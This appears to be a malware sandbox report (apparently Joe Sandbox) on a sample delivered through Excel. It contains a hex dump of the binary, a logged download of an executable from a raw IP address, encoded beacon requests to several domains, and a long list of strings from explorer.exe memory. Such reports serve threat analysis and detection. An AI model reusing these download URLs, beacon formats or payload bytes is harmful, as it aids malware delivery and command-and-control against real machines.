00 00 24 53 0f 00 00 20 00 00 00 54 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 05 00 00 00 80 0f 00 00 06 00 00 00 56 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0f 00 00 02 00 00 00 5c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 d1 0c 00 f8 a0 02 00 03 00 00 00 85 02 00 06 08 e9 03 00 d0 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b2 2f ee 7c 11 a1 96 e6 10 8f ef f8 ed 01 ee 28 c0 c6 16 57 a0 2e 9b 1e 28 96 a4 cd c5 44 67 2b 0a e9 16 dc ec ae 1c da 83 35 18 f5 c6 af 07 54 39 45 16 2f 64 cd 4d e8 bf a9 31 51 ae 81 aa 81 21 a1 2b b9 5d 17 01 47 1a d5 32 5c be 61 22 d7 63 30 30 34 df 44 92 6c e3 dd 36 a1 5d 8a 1d 5c 18 b6 6e aa c0 14 7c fe ab b6 5c 5a 34 05 06 2d 1d 33 5f 09 29 f6 08 22 12 b0 6c d6 23 ee 67 c8 3d e0 d0 5c 52 f1 dc 44 2d 08 d5 a8 99 34 fd de a6 fa 82 50 1f c2 3f 28 f4 76 68 c3 88 2e a6 d6 73 16 be e2 be f8 67 83 c7 7c 3d 11 86 af ca 46 5a 6c 58 26 04 d6 b1 9c 8e d4 12 a5 e6 5b f2 40 64 45 2a f7 70 64 c0 25 66 7d 49 9b cb 81 f4 b5 b8 14 8b 77 3c 38 70 8a 15 fe 20 33 bd 40 6d 1d d8 bc 44 6e 50 9b fd 04 f7 29 2e 25 43 10 ee 4e 3f 88 00 63 cc ee c4 f8 40 f3 65 3b 9e 1c da 34 68 62 d3 aa a1 d5 76 ce 3e ec a0 bd c7 8d d6 37 2e d4 06 f2 79 13 ad a9 c9 24 53 40 2f 29 e2 0f 08 93 8d 40 c6 d5 a5 1
          Source: global trafficHTTP traffic detected: GET /bw82/?Ab=gXuD_lh8bfV4RN&x2J8=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ== HTTP/1.1Host: www.usmedicarenow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?x2J8=2vyuGwHlN7ZUWGXZJyrkWp+hlAiWIN0rCXJnc3deUzDL3Fz4XyzD024y+ZTONjn0V5JpIg==&Ab=gXuD_lh8bfV4RN HTTP/1.1Host: www.curateherstories.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN HTTP/1.1Host: www.kolamart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?Ab=gXuD_lh8bfV4RN&x2J8=9KGhaNjgEAjOuiPnGmkWJtXE2Tv4ryq1r5IcCqZotckyUU+N2GtErEKHJSdKgyTchgl25w== HTTP/1.1Host: www.magnabeautystyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
          Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /ttkkz/file1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.195.87.136Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: unknownTCP traffic detected without corresponding DNS query: 18.195.87.136
          Source: C:\Windows\explorer.exeCode function: 6_2_02971302 getaddrinfo,setsockopt,recv,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EFB3CBA.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /ttkkz/file1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.195.87.136Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bw82/?Ab=gXuD_lh8bfV4RN&x2J8=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ== HTTP/1.1Host: www.usmedicarenow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?x2J8=2vyuGwHlN7ZUWGXZJyrkWp+hlAiWIN0rCXJnc3deUzDL3Fz4XyzD024y+ZTONjn0V5JpIg==&Ab=gXuD_lh8bfV4RN HTTP/1.1Host: www.curateherstories.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?x2J8=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&Ab=gXuD_lh8bfV4RN HTTP/1.1Host: www.kolamart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bw82/?Ab=gXuD_lh8bfV4RN&x2J8=9KGhaNjgEAjOuiPnGmkWJtXE2Tv4ryq1r5IcCqZotckyUU+N2GtErEKHJSdKgyTchgl25w== HTTP/1.1Host: www.magnabeautystyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.usmedicarenow.com
          Source: explorer.exe, 00000006.00000000.2197502968.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197502968.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2187542396.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2186062266.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000006.00000000.2177669632.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2197656827.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
